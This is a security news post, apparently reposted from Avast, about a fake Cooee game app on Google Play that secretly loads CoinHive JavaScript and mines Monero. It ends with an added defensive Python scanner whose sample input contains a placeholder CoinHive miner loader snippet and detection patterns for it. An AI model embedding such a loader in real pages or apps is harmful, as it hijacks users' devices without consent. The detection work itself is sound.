Cryptocurrency mining malware sneaks onto Google Play

LASER_oneXM

Avast finds and detects an app that mines the Monero cryptocurrency

Cryptocurrency mining is a hot and trending topic at the moment, especially since websites have recently resorted to mining cryptocurrency instead of showing ads. As with many malicious trends, the cybercriminals have quickly moved from PC to mobile. This week, we found an app that contains cryptocurrency mining capabilities on the Google Play Store, masquerading as the Cooee game. Between 1,000 and 5,000 users downloaded the app. We detect the malware as JSMiner and we informed Google of the app yesterday.

XCooeep_Google_Play_app.png


XCooeep_Google_Play_app_details.png


Cryptocurrency mining
It’s important to understand that mining cryptocurrency is actually a legit business. Scaling enough to maximize profit requires strong computing power, though, which is why some miners run huge server farms to mine Bitcoin or other cryptocurrencies, such as Litecoin, Ethereum, or Monero. Constructing and maintaining the infrastructure and accessing the electricity necessary to run them requires enormous financial investment.

Since mining cryptocurrencies is expensive, miners are resorting to abusing the processing power of other devices and are spreading mining programs through apps and websites. We consider cryptocurrency mining malicious when it is done without the user’s permission, which is what happened in this case.

Let the mining begin… or not

In order for the malware to start the process of mining, all the user needs to do after downloading the app is click the button below. The button’s actual main purpose should be to allow the user to log into the Cooee Club 3D Chat Community panel.

XCOOEEP_Button.png


After clicking the button above, a new webview is opened in the background. This allows the malware to load CoinHive JavaScript code from an external host address. The mining then begins.

Once the mining process begins, the phone will heat up, as CPU utilization is very high.

The malware mines the cryptocurrency Monero. The end goal for the cybercriminals is financial gain, but what the cybercriminals don’t seem to realize is that mining on a mobile device cannot deliver much profit. Mobile devices don’t have the processing power that PCs have to really successfully mine, and on top of that, mobile devices often have limited battery life, because they are not constantly being charged, thus limiting the mining time.
 
Reactions: vemn and harlan4096
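
A static check a defender could run over an unpacked app's text assets, or over response bodies captured from the background webview, for the CoinHive loader the post describes. This is an added example, not code from the original post or from Avast; the host name and site key in the sample are constructed placeholders, and the patterns assume the miner's public `CoinHive.Anonymous` / `CoinHive.User` / `CoinHive.Token` JavaScript constructors.

```python
import re
from urllib.parse import urlparse

# Indicators of the publicly documented CoinHive browser-miner API.
SCRIPT_SRC = re.compile(r"""<script[^>]+src\s*=\s*["']([^"']+)["']""", re.I)
MINER_CTOR = re.compile(
    r"""CoinHive\.(Anonymous|User|Token)\s*\(\s*["']([^"']+)["']""")
MINER_START = re.compile(r"\.start\s*\(")
MINER_FILE = re.compile(r"coinhive(\.min)?\.js$", re.I)


def scan_blob(name, text):
    """Return a finding dict for one text blob, or None if nothing matched."""
    # Match on the script file name, not the domain: the page says the code
    # is loaded from an external host, which need not be the miner's own site.
    hosts = sorted({urlparse(u).netloc for u in SCRIPT_SRC.findall(text)
                    if MINER_FILE.search(urlparse(u).path)})
    ctors = MINER_CTOR.findall(text)
    if not hosts and not ctors:
        return None
    return {
        "file": name,
        "script_hosts": hosts,
        "site_keys": sorted({key for _, key in ctors}),
        # Constructor plus start() means mining begins with no further prompt.
        "auto_start": bool(ctors) and bool(MINER_START.search(text)),
    }


def scan_app(blobs):
    """Scan {name: text} and return only the blobs with miner indicators."""
    return [f for f in (scan_blob(n, t) for n, t in blobs.items()) if f]


# Constructed sample input: host and site key are placeholders.
SAMPLE = {
    "assets/login.html": """
        <html><body>
        <script src="https://cdn.example.invalid/lib/coinhive.min.js"></script>
        <script>
          var m = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');
          m.start();
        </script></body></html>""",
    "assets/about.html": "<html><script src='https://example.invalid/app.js'>"
                         "</script><p>Cooee chat</p></html>",
}

if __name__ == "__main__":
    for finding in scan_app(SAMPLE):
        print(finding)
```

If the app fetches the miner page only at runtime, the packaged assets will be clean; in that case feed the scanner the response bodies recorded by an intercepting proxy instead.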
